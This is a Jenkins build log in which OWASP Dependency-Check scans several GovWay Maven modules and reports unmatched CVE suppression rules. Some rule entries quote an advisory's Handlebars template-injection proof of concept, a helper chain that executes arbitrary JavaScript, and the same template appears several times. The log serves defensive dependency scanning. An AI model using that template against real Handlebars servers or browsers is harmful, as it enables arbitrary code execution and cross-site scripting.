caseSensitive=false},cve={CVE-2026-23907,}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:39:11 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:39:11 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:39:11 [INFO] Analysis Complete (5 seconds) 17:39:11 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:39:11 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:39:11 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:39:11 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:39:11 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:39:11 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:39:11 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:39:11 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:39:12 [INFO] 17:39:12 [INFO] ------------< org.openspcoop2:org.openspcoop2.antinstaller >------------ 17:39:12 [INFO] Building dependencies.antinstaller 1.0 [4/67] 17:39:12 [INFO] from mvn/dependencies/antinstaller/pom.xml 17:39:12 [INFO] --------------------------------[ pom ]--------------------------------- 17:39:12 [INFO] 17:39:12 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.antinstaller --- 17:39:12 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/antinstaller (includes = [*.jar], excludes = []) 17:39:12 [INFO] 17:39:12 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.antinstaller --- 17:39:12 [INFO] 17:39:12 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.antinstaller --- 17:39:12 [INFO] Executing tasks 17:39:17 [INFO] Executed tasks 17:39:17 [INFO] 17:39:17 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.antinstaller --- 17:39:17 [INFO] Checking for updates 17:39:17 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:39:17 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:39:17 [INFO] Check for updates complete (80 ms) 17:39:17 [INFO] 17:39:17 17:39:17 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:39:17 17:39:17 17:39:17 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:39:17 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:39:17 17:39:17 17:39:17 [INFO] Analysis Started 17:39:18 [INFO] Finished Archive Analyzer (0 seconds) 17:39:18 [INFO] Finished File Name Analyzer (0 seconds) 17:39:18 [INFO] Finished Jar Analyzer (0 seconds) 17:39:18 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:39:18 [INFO] Finished Hint Analyzer (0 seconds) 17:39:18 [INFO] Finished Version Filter Analyzer (0 seconds) 17:39:20 [INFO] Created CPE Index (2 seconds) 17:39:20 [INFO] Finished CPE Analyzer (2 seconds) 17:39:20 [INFO] Finished False Positive Analyzer (0 seconds) 17:39:20 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:39:20 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:39:20 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:39:20 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:39:20 17:39:20 17:39:20 ## Recommendation 17:39:20 17:39:20 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:39:20 17:39:20 The following template can be used to demonstrate the vulnerability: 17:39:20 ```{{#with "constructor"}} 17:39:20 {{#with split as |a|}} 17:39:20 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:39:20 {{#with (concat (lookup join (slice 0 1)))}} 17:39:20 {{#each (slice 2 3)}} 17:39:20 {{#with (apply 0 a)}} 17:39:20 {{.}} 17:39:20 {{/with}} 17:39:20 {{/each}} 17:39:20 {{/with}} 17:39:20 {{/with}} 17:39:20 {{/with}}``` 17:39:20 17:39:20 17:39:20 ## Recommendation 17:39:20 17:39:20 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:39:20 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:39:20 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:39:20 [INFO] Analysis Complete (2 seconds) 17:39:20 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:39:20 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:39:20 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:39:20 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:39:20 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:39:20 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:39:20 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:39:20 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:39:20 [INFO] 17:39:20 [INFO] ---------------< org.openspcoop2:org.openspcoop2.angus >---------------- 17:39:20 [INFO] Building dependencies.angus 1.0 [5/67] 17:39:20 [INFO] from mvn/dependencies/angus/pom.xml 17:39:20 [INFO] --------------------------------[ pom ]--------------------------------- 17:39:20 [INFO] 17:39:20 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.angus --- 17:39:20 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/angus (includes = [*.jar], excludes = []) 17:39:20 [INFO] 17:39:20 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.angus --- 17:39:20 [INFO] 17:39:20 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.angus --- 17:39:21 [INFO] Executing tasks 17:39:26 [INFO] Executed tasks 17:39:26 [INFO] 17:39:26 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.angus --- 17:39:26 [INFO] Checking for updates 17:39:26 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:39:26 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:39:26 [INFO] Check for updates complete (116 ms) 17:39:27 [INFO] 17:39:27 17:39:27 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:39:27 17:39:27 17:39:27 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:39:27 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:39:27 17:39:27 17:39:27 [INFO] Analysis Started 17:39:27 [INFO] Finished Archive Analyzer (0 seconds) 17:39:27 [INFO] Finished File Name Analyzer (0 seconds) 17:39:27 [INFO] Finished Jar Analyzer (0 seconds) 17:39:27 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:39:27 [INFO] Finished Hint Analyzer (0 seconds) 17:39:27 [INFO] Finished Version Filter Analyzer (0 seconds) 17:39:30 [INFO] Created CPE Index (3 seconds) 17:39:31 [INFO] Finished CPE Analyzer (3 seconds) 17:39:31 [INFO] Finished False Positive Analyzer (0 seconds) 17:39:31 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:39:31 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:39:31 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:39:31 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:39:31 17:39:31 17:39:31 ## Recommendation 17:39:31 17:39:31 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:39:31 17:39:31 The following template can be used to demonstrate the vulnerability: 17:39:31 ```{{#with "constructor"}} 17:39:31 {{#with split as |a|}} 17:39:31 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:39:31 {{#with (concat (lookup join (slice 0 1)))}} 17:39:31 {{#each (slice 2 3)}} 17:39:31 {{#with (apply 0 a)}} 17:39:31 {{.}} 17:39:31 {{/with}} 17:39:31 {{/each}} 17:39:31 {{/with}} 17:39:31 {{/with}} 17:39:31 {{/with}}``` 17:39:31 17:39:31 17:39:31 ## Recommendation 17:39:31 17:39:31 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:39:31 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:39:31 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:39:31 [INFO] Analysis Complete (4 seconds) 17:39:31 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:39:31 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:39:31 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:39:31 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:39:31 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:39:31 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:39:31 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:39:31 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:39:32 [INFO] 17:39:32 [INFO] ----------< org.openspcoop2:org.openspcoop2.bean-validation >----------- 17:39:32 [INFO] Building dependencies.bean-validation 1.0 [6/67] 17:39:32 [INFO] from mvn/dependencies/bean-validation/pom.xml 17:39:32 [INFO] --------------------------------[ pom ]--------------------------------- 17:39:32 [INFO] 17:39:32 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.bean-validation --- 17:39:32 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/bean-validation (includes = [*.jar], excludes = []) 17:39:32 [INFO] 17:39:32 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.bean-validation --- 17:39:32 [INFO] 17:39:32 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.bean-validation --- 17:39:32 [INFO] Executing tasks 17:39:37 [INFO] Executed tasks 17:39:37 [INFO] 17:39:37 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.bean-validation --- 17:39:37 [INFO] Checking for updates 17:39:37 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:39:37 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:39:37 [INFO] Check for updates complete (82 ms) 17:39:37 [INFO] 17:39:37 17:39:37 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:39:37 17:39:37 17:39:37 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:39:37 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:39:37 17:39:37 17:39:37 [INFO] Analysis Started 17:39:37 [INFO] Finished Archive Analyzer (0 seconds) 17:39:37 [INFO] Finished File Name Analyzer (0 seconds) 17:39:37 [INFO] Finished Jar Analyzer (0 seconds) 17:39:37 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:39:37 [INFO] Finished Hint Analyzer (0 seconds) 17:39:37 [INFO] Finished Version Filter Analyzer (0 seconds) 17:39:39 [INFO] Created CPE Index (2 seconds) 17:39:40 [INFO] Finished CPE Analyzer (2 seconds) 17:39:40 [INFO] Finished False Positive Analyzer (0 seconds) 17:39:40 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:39:40 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:39:40 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:39:40 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:39:40 17:39:40 17:39:40 ## Recommendation 17:39:40 17:39:40 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:39:40 17:39:40 The following template can be used to demonstrate the vulnerability: 17:39:40 ```{{#with "constructor"}} 17:39:40 {{#with split as |a|}} 17:39:40 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:39:40 {{#with (concat (lookup join (slice 0 1)))}} 17:39:40 {{#each (slice 2 3)}} 17:39:40 {{#with (apply 0 a)}} 17:39:40 {{.}} 17:39:40 {{/with}} 17:39:40 {{/each}} 17:39:40 {{/with}} 17:39:40 {{/with}} 17:39:40 {{/with}}``` 17:39:40 17:39:40 17:39:40 ## Recommendation 17:39:40 17:39:40 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:39:40 [INFO] Suppression Rule had zero matches: 